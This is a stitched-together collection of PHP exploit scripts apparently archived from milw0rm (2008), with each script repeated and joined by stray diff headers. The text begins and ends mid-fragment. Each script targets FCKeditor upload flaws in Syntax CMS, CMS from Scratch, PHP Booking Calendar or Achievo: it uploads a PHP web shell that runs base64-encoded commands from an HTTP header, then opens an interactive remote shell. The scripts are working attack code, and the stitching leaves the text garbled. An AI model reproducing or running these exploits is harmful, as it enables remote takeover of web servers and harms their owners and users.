54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n| Syntax CMS <= 1.3 Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /Syntax/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-29]
<?php
/*
--------------------------------------------------------------
Syntax CMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For the Exploit Code
author...: Stack
mail.....: Ev!L
descr:
if the web site change the name of path or path is /public/ you can delet /public/ in the exploit
in the line :
"POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php
[-] vulnerable code in /public/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n| Syntax CMS <= 1.3 Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /Syntax/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-29]


@ -1,133 +1,133 @@
<?php
/*
-----------------------------------------------------------------
CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit
-----------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.[1].: http://cmsfromscratch.com/
link.[2].: http://cmsfromscratch.googlecode.com/files/cmsfs114b.tgz (tested package)
[-] vulnerable code in /cms/FCKeditor/editor/filemanager/connectors/php/config.php
27. // SECURITY: You must explicitelly enable this "connector". (Set it to "true").
28. // WARNING: don't just set "ConfigIsEnabled = true", you must be sure that only
29. // authenticated users can access this file or use some kind of session checking.
30. $Config['Enabled'] = true ; <======
31.
32. $path = $_SERVER["REQUEST_URI"] ;
33. $relativePathFromWebServerRoot = substr($path, 0, strpos($path, "/", 1) );
34. // Coming out as /CMS, why???
35.
36.
37.
38. // Path to user files relative to the document root.
39. // This is what is inserted into the HTML markup
40. $Config['UserFilesPath'] = urldecode(rtrim(str_replace('cms/FCKeditor/editor/filemanager/connectors/php', '', dirname($_SERVER['SCRIPT_NAME'])), '/')) ;
41. if ($Config['UserFilesPath'] == '') $Config['UserFilesPath'] = '/' ;
42.
43. // Fill the following value it you prefer to specify the absolute path for the user files directory. Useful if you are using a virtual directory, symbolic link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
44. // Attention: The above 'UserFilesPath' must point to the same directory.
45. // BH note: This is used for browsing the server.. should equate to the real path of the folder where /cms/ is installed
46. $Config['UserFilesAbsolutePath'] = realpath('../../../../../../') ;
47.
48. // Due to security issues with Apache modules, it is reccomended to leave the following setting enabled.
49. $Config['ForceSingleExtension'] = true ;
50. // Perform additional checks for image files
51. // if set to true, validate image size (using getimagesize)
52. $Config['SecureImageUploads'] = true;
53. // What the user can do with this connector
54. $Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;
55. // Allowed Resource Types
56. $Config['ConfigAllowedTypes'] = array('File', 'Image', 'Flash', 'Media') ;
57. // For security, HTML is allowed in the first Kb of data for files having the following extensions only.
58. $Config['HtmlExtensions'] = array("html", "htm", "xml", "xsd", "txt", "js") ;
59.
60. $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'php', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
61. $Config['DeniedExtensions']['File'] = array() ; <========
62. $Config['FileTypesPath']['File'] = $Config['UserFilesPath'] ;
63. $Config['FileTypesAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
64. $Config['QuickUploadPath']['File'] = $Config['UserFilesPath'] ;
65. $Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to
$Config['AllowedExtensions']['File'] array, used in IsAllowedExt() function to check the file's extension, contains also .php extension
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+---------------------------------------------------------------+";
print "\n| CMS from Scratch <= 1.1.3 Remote Shell Upload Exploit by EgiX |";
print "\n+---------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /cms114/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php\"\r\n";
$data .= "Content-Type: unknown/unknown\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/cms/FCKeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\ncmsfs-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-29]
<?php
/*
-----------------------------------------------------------------
CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit
-----------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.[1].: http://cmsfromscratch.com/
link.[2].: http://cmsfromscratch.googlecode.com/files/cmsfs114b.tgz (tested package)
[-] vulnerable code in /cms/FCKeditor/editor/filemanager/connectors/php/config.php
27. // SECURITY: You must explicitelly enable this "connector". (Set it to "true").
28. // WARNING: don't just set "ConfigIsEnabled = true", you must be sure that only
29. // authenticated users can access this file or use some kind of session checking.
30. $Config['Enabled'] = true ; <======
31.
32. $path = $_SERVER["REQUEST_URI"] ;
33. $relativePathFromWebServerRoot = substr($path, 0, strpos($path, "/", 1) );
34. // Coming out as /CMS, why???
35.
36.
37.
38. // Path to user files relative to the document root.
39. // This is what is inserted into the HTML markup
40. $Config['UserFilesPath'] = urldecode(rtrim(str_replace('cms/FCKeditor/editor/filemanager/connectors/php', '', dirname($_SERVER['SCRIPT_NAME'])), '/')) ;
41. if ($Config['UserFilesPath'] == '') $Config['UserFilesPath'] = '/' ;
42.
43. // Fill the following value it you prefer to specify the absolute path for the user files directory. Useful if you are using a virtual directory, symbolic link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
44. // Attention: The above 'UserFilesPath' must point to the same directory.
45. // BH note: This is used for browsing the server.. should equate to the real path of the folder where /cms/ is installed
46. $Config['UserFilesAbsolutePath'] = realpath('../../../../../../') ;
47.
48. // Due to security issues with Apache modules, it is reccomended to leave the following setting enabled.
49. $Config['ForceSingleExtension'] = true ;
50. // Perform additional checks for image files
51. // if set to true, validate image size (using getimagesize)
52. $Config['SecureImageUploads'] = true;
53. // What the user can do with this connector
54. $Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;
55. // Allowed Resource Types
56. $Config['ConfigAllowedTypes'] = array('File', 'Image', 'Flash', 'Media') ;
57. // For security, HTML is allowed in the first Kb of data for files having the following extensions only.
58. $Config['HtmlExtensions'] = array("html", "htm", "xml", "xsd", "txt", "js") ;
59.
60. $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'php', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
61. $Config['DeniedExtensions']['File'] = array() ; <========
62. $Config['FileTypesPath']['File'] = $Config['UserFilesPath'] ;
63. $Config['FileTypesAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
64. $Config['QuickUploadPath']['File'] = $Config['UserFilesPath'] ;
65. $Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to
$Config['AllowedExtensions']['File'] array, used in IsAllowedExt() function to check the file's extension, contains also .php extension
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+---------------------------------------------------------------+";
print "\n| CMS from Scratch <= 1.1.3 Remote Shell Upload Exploit by EgiX |";
print "\n+---------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /cms114/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php\"\r\n";
$data .= "Content-Type: unknown/unknown\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/cms/FCKeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\ncmsfs-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-29]


@ -1,137 +1,137 @@
<?php
/*
--------------------------------------------------------------
PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
Special thnx for : Egix
[-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|PHP Booking Calendar 10d Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-29]
<?php
/*
--------------------------------------------------------------
PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
Special thnx for : Egix
[-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|PHP Booking Calendar 10d Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-29]


@ -1,125 +1,125 @@
<?php
/*
-----------------------------------------------------------------
Achievo <= 1.3.2 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.achievo.org/
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in /atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
121. //File Area
122. $fckphp_config['ResourceAreas']['File'] =array(
123.
124. //Files(identified by extension) that may be uploaded to this area
125. 'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
with a default configuration of this script, an attacker might be able to upload arbitrary
